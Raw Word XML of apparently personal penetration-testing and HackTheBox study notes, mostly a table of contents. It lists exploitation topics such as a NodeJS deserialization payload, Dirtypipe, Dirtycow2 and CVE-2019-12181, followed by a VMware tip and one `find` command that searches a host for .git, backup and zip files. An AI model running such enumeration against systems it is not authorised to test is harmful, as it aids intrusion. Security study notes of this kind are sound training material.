        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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kkl4gqdgfk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.bz2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">643</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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8l86ky0406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Captcha</w:t>
              <w:tab/>
              <w:t xml:space="preserve">644</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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kugwkj8jii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QR Code</w:t>
              <w:tab/>
              <w:t xml:space="preserve">644</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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2txbze0j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multiple lines into file using a single echo command</w:t>
              <w:tab/>
              <w:t xml:space="preserve">644</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F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1npxuqdlkh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install an application as a .deb file</w:t>
              <w:tab/>
              <w:t xml:space="preserve">645</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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saeib8hvj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read the "help" output</w:t>
              <w:tab/>
              <w:t xml:space="preserve">645</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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ersxlr1ke5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New Attack Methods</w:t>
              <w:tab/>
              <w:t xml:space="preserve">650</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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nqrc1pz5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to POST and type juggling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">650</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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g78begcz6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Hex Data</w:t>
              <w:tab/>
              <w:t xml:space="preserve">652</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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qkun3vd8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 a serialized payload for code execution through NodeJS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">652</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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m3l8kgky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CuteNews</w:t>
              <w:tab/>
              <w:t xml:space="preserve">653</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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5fpc29566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Scrolling</w:t>
              <w:tab/>
              <w:t xml:space="preserve">653</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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u8cnol71g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the flag as a password for an account</w:t>
              <w:tab/>
              <w:t xml:space="preserve">654</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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0wftz4qh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textpattern</w:t>
              <w:tab/>
              <w:t xml:space="preserve">654</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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y0nidva9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.mysql_history</w:t>
              <w:tab/>
              <w:t xml:space="preserve">654</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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8rotjxos0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files when there are multiple web servers</w:t>
              <w:tab/>
              <w:t xml:space="preserve">654</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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k26vyh4w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Fernet</w:t>
              <w:tab/>
              <w:t xml:space="preserve">655</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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q7l7pd3z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Dirtycow2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">655</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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lcixo4cgk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Antivirus scan and CHKROOTKIT</w:t>
              <w:tab/>
              <w:t xml:space="preserve">655</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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ugqzu58n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Irc unreal</w:t>
              <w:tab/>
              <w:t xml:space="preserve">655</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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b4chseuo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Morse Code</w:t>
              <w:tab/>
              <w:t xml:space="preserve">656</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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jf5m1ef3l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eLection website</w:t>
              <w:tab/>
              <w:t xml:space="preserve">656</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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7gh1egp4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Serv-U FTP Server (CVE-2019–12181)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">656</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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3sms3mji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CMSMS (CMS Made Simple)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">656</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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6e6pfq3bh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does not exist" error message</w:t>
              <w:tab/>
              <w:t xml:space="preserve">657</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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zov1ywja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Joomla</w:t>
              <w:tab/>
              <w:t xml:space="preserve">658</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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z1o5m6ec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ROT1 / ROT13</w:t>
              <w:tab/>
              <w:t xml:space="preserve">658</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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j2q2yza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hexadecimal shell code</w:t>
              <w:tab/>
              <w:t xml:space="preserve">658</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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mdy5vg8r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WiFi Mouse (Mouse Server)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">659</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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nfx6ofc4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Mobile Mouse Server</w:t>
              <w:tab/>
              <w:t xml:space="preserve">660</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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bb81q1em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Aerospike</w:t>
              <w:tab/>
              <w:t xml:space="preserve">661</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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rahpdmi6c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Apache Commons Text 1.8</w:t>
              <w:tab/>
              <w:t xml:space="preserve">664</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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ywjz4dln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JDWP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">665</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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0r4i6635h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Dirtypipe (CVE-2022-0847)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">666</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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wi9dwxrf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Usermin (webmin, MiniServ)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">668</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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padngqzm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Vesta</w:t>
              <w:tab/>
              <w:t xml:space="preserve">672</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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qy3yq2nx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clamav</w:t>
              <w:tab/>
              <w:t xml:space="preserve">674</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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757vh39s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Zookeeper (port 2181)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">674</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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cirsllpm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OpenSMTP (version of SMTP)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">674</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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cy06xypw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Cassandra-web and Cassandra Query Language (CQL)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">674</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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9ph4shuc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disk group (6(disk))</w:t>
              <w:tab/>
              <w:t xml:space="preserve">675</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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v3snp8ni0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string, and -h/--help and -v/--version to find information about unknown binaries</w:t>
              <w:tab/>
              <w:t xml:space="preserve">677</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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5t3yq8lw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Gitea</w:t>
              <w:tab/>
              <w:t xml:space="preserve">678</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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xzhkfx63yq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Random stuff</w:t>
              <w:tab/>
              <w:t xml:space="preserve">678</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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xdioxsr717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HackTheBox Summary</w:t>
              <w:tab/>
              <w:t xml:space="preserve">691</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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jghjoax5g2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Penelope</w:t>
              <w:tab/>
              <w:t xml:space="preserve">691</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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ni6mdd2v99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view and change resolution of VM</w:t>
              <w:tab/>
              <w:t xml:space="preserve">693</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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0e7od8otbx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Script</w:t>
              <w:tab/>
              <w:t xml:space="preserve">694</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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ia3c0j127f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VIM</w:t>
              <w:tab/>
              <w:t xml:space="preserve">694</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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0f71ihxfyy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switch from terminal to powershell in Kali</w:t>
              <w:tab/>
              <w:t xml:space="preserve">698</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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5nfhs1l782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tmux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">698</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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zsl0hboc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Enable Mouse Support (scrolling through terminal using mouse):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">703</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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8w3foz95h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select text after you Enable Mouse Support</w:t>
              <w:tab/>
              <w:t xml:space="preserve">703</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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82vzccfaj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tmux with SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">703</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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aqjipbum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Installing tmux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">704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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lt8x31ewoxav" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to drag and drop from local window to VMWare:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open terminal in VMWare</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Drag and drop into terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A string will appear in the terminal, which will be the path to where the drag and drop is located!</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000240">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -name ".git",*backup*,*.zip, 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000241">
      <w:pPr>
        <w:numPr>
